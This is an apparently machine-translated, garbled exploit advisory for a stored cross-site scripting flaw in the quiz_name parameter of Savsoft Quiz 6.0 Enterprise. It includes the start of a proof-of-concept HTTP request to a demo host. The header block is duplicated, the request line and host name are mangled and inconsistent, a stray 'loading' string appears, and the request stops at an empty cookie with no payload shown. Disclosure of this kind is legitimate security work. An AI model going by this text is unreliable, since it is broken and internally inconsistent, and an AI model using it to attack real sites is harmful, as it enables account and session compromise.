#利用title: Savsoft测验V6.0企业- 持续的跨站点
脚本
#日期: 2024-01-03
#利用作者: Eren Sen
#vendor: Savsoft测验
#供应商HomePage: https://savsoftquiz.com
#软件link: https://savsoftquiz.com/web/index.php/online-demo/
#版本: 6.0
#cve-id: n/a
#测试在: Kali Linux/Windows 10
#发现日期: 2024/01/03
#持续的跨站点脚本(XSS)漏洞
#脆弱参数类型:帖子
#弱点参数: quiz_name
#概念证明:
#HTTP请求:
post/savsoft_quizdemk1my5jr/index.php/quiz/insert_quiz/http/1.1
HOST: DEMOS1.SOFTACULUL.COM
cookie: ci_session=
脚本
#日期: 2024-01-03
#利用作者: Eren Sen
#vendor: Savsoft测验
#供应商HomePage: https://savsoftquiz.com
#软件link: https://savsoftquiz.com/web/index.php/online-demo/
#版本: 6.0
#cve-id: n/a
#测试在: Kali Linux/Windows 10
#发现日期: 2024/01/03
#持续的跨站点脚本(XSS)漏洞
#脆弱参数类型:帖子
#弱点参数: quiz_name
#概念证明:
正在加载...
demos1.softaculous.com
post/savsoft_quizdemk1my5jr/index.php/quiz/insert_quiz/http/1.1
HOST: DEMOS1.SOFTACULUL.COM
cookie: ci_session=